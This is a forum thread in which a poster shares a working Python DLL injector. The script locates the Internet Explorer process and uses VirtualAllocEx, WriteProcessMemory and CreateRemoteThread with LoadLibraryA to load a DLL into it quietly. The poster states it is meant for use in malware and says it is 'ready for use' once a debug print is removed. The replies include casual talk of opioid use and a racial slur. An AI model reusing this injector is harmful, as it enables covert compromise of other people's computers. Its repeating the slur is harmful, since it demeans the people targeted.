User Controls

Injecting DLL.

  1. #1
    Sophie Pedophile Tech Support
    Avast! I have returned with another python thread. So i was reading about malware and what not and i came upon some articles that had to do with dll injection. Interested, i set out to create my own dll injector. After some research this is what i came up with.

    Since this is intended for use in malware we're just going to quietly inject the dll we have specified into the internet explorer process. This script assumes you have your dll ready to go under the name mydll.dll in the same folder as the script(Presumably in a directory where it was downloaded with your malicious executable or something of the sort).

    What's more the script automatically gets the proper Process ID of internet explorer and uses it to inject our DLL.


    from win32com.client import GetObject
    from ctypes import *
    import sys, ctypes, os, string, time

    Wmi = GetObject('winmgmts:')
    processes = Wmi.InstancesOf('Win32_Process')
    # Get the internet explorer process
    explorer = Wmi.ExecQuery('select * from Win32_Process where Name="iexplore.exe"')
    # Grab its Pid
    PID = explorer[0].Properties_('ProcessId').Value

    # Get DLL path
    file = 'mydll.dll'

    path = os.path.dirname(__file__)
    DLL_PATH = os.path.join(path, file)


    # Define constants we use
    PAGE_RW_PRIV = 0x04
    PROCESS_ALL_ACCESS = 0x1F0FFF
    VIRTUAL_MEM = 0x3000

    #CTYPES handler
    kernel32 = windll.kernel32

    def dll_inject(PID,DLL_PATH):
    LEN_DLL = len(DLL_PATH)# get the length of the DLL PATH
    hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS,False,PID)

    if hProcess == None:

    sys.exit(0)

    DLL_PATH_ADDR = kernel32.VirtualAllocEx(hProcess,
    0,
    LEN_DLL,
    VIRTUAL_MEM,
    PAGE_RW_PRIV)
    bool_Written = c_int(0)

    kernel32.WriteProcessMemory(hProcess,
    DLL_PATH_ADDR,
    DLL_PATH,
    LEN_DLL,
    byref(bool_Written))

    kernel32DllHandler_addr = kernel32.GetModuleHandleA("kernel32")

    LoadLibraryA_func_addr = kernel32.GetProcAddress(kernel32DllHandler_addr,"LoadLibraryA")


    thread_id = c_ulong(0) # for our thread id

    if not kernel32.CreateRemoteThread(hProcess,
    None,
    0,
    LoadLibraryA_func_addr,
    DLL_PATH_ADDR,
    0,
    byref(thread_id)):

    sys.exit(0)
    else:
    print "Remote Thread 0x%08x created, DLL code injected" % thread_id.value


    Simply comment out the last 'else' and 'print' and it's ready for use. The reason i kept it in is for testing purposes
  2. #2
    Sophie Pedophile Tech Support
    >tfw no replies
  3. #3
    Pauly Roger Yung Blood
    I thought you were going to be injecting some type of new drug or diladid. Do you even dod drugs?
  4. #4
    Sophie Pedophile Tech Support
    I thought you were going to be injecting some type of new drug or diladid. Do you even dod drugs?

    Of course i do drugs, in fact i'm on 60mg of oxy as i type this but i inject things in cyber space as well as in real life breh, also, if this thread was about injecting drugs it would be in BLTC.
  5. #5
    mashlehash victim of incest [my perspicuously dependant flavourlessness]
    Why don't you call someone a nigger?
Jump to Top